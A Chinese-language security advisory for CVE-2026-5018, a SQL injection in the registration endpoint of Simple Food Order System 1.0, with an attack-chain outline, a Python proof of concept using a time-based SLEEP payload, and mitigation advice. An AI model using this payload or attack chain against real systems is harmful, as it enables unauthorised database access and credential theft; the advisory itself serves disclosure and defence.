CVE-2026-5018 Simple Food Order System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5018

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Simple Food Order System

漏洞概述

code-projects Simple Food Order System 1.0版本被披露存在SQL注入漏洞。漏洞根源在于register-router.php文件的参数处理组件对用户提交的“Name”参数缺乏有效的安全过滤。攻击者无需任何用户认证，即可通过网络远程向该接口发送特制的恶意数据包。该漏洞成功利用后，攻击者能够执行任意SQL命令，从而窃取数据库敏感信息、破坏数据完整性或造成服务拒绝攻击。鉴于利用代码已公开，风险较高。

技术细节

该漏洞位于Simple Food Order System 1.0版本的注册处理逻辑中，具体涉及文件`register-router.php`。在系统接收用户注册请求时，后端代码直接提取POST请求中的“Name”字段，并将其动态拼接到SQL查询语句中执行。由于开发人员未实施输入验证机制，也未使用参数化查询，导致该参数成为典型的SQL注入点。攻击者可以通过在“Name”字段中注入单引号、UNION查询或布尔逻辑语句，绕过前端验证并直接与后端数据库交互。根据CVSS 3.1评分向量，该漏洞攻击复杂度低，无需用户交互且无需特定权限。攻击者可利用此漏洞通过自动化工具批量探测目标，进而获取数据库中的用户凭证、订单信息等敏感数据，甚至在某些特定数据库配置下尝试写入WebShell以获取服务器控制权，严重威胁系统安全。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描互联网或内网，寻找Simple Food Order System 1.0版本的实例，确定register-router.php接口是否暴露。

STEP 2

2. 漏洞探测

攻击者向register-router.php发送POST请求，在“Name”参数中注入SQL测试载荷（如单引号、AND 1=1等），观察应用响应差异。

STEP 3

3. 漏洞利用

确认存在注入后，攻击者构造高级SQL语句（UNION SELECT），查询数据库结构，提取管理员账户密码或用户敏感数据。

STEP 4

4. 权限提升与维持

利用获取的管理员凭证登录后台，或利用特定数据库函数写入WebShell，进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests def verify_sqli(target_url): """ PoC for CVE-2026-5018 Tests for SQL Injection in the 'Name' parameter of register-router.php """ # Target endpoint url = f"{target_url}/register-router.php" # Payload to test for time-based or boolean-based SQL injection # Example: Checking if the database sleeps, or logic bypass payload = "admin' OR SLEEP(5)-- " # Data payload mimicking a legitimate registration request data = { "Name": payload, "Email": "[email protected]", "Password": "test123", "Contact": "1234567890" } try: print(f"[+] Sending payload to {url}...") response = requests.post(url, data=data, timeout=10) # Analyze response (This depends on specific blind/error behavior) if response.elapsed.total_seconds() >= 5: print("[!] Potential SQL Injection vulnerability confirmed (Time-based).") elif "error" in response.text.lower() or "sql" in response.text.lower(): print("[!] Potential SQL Injection vulnerability confirmed (Error-based).") else: print("[-] Vulnerability could not be confirmed automatically.") except requests.RequestException as e: print(f"[Error] Request failed: {e}") if __name__ == "__main__": target = "http://127.0.0.1/Simple_Food_Order_System" # Replace with actual target verify_sqli(target)

影响范围

Simple Food Order System 1.0

防御指南

临时缓解措施

建议立即停止使用受影响的Simple Food Order System 1.0版本，或检查源代码中的register-router.php文件。在代码修复前，应在WAF层添加针对“Name”参数的SQL注入防护规则，并暂时关闭对外部用户的注册功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5018
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5018
3 Details https://www.cvedetails.com/cve/CVE-2026-5018/
4 VulDB https://vuldb.com/cve/CVE-2026-5018
5 Link https://code-projects.org/
6 Link https://github.com/6Justdododo6/CVE/issues/16
7 Link https://vuldb.com/submit/779336
8 Link https://vuldb.com/vuln/353903
9 Link https://vuldb.com/vuln/353903/cti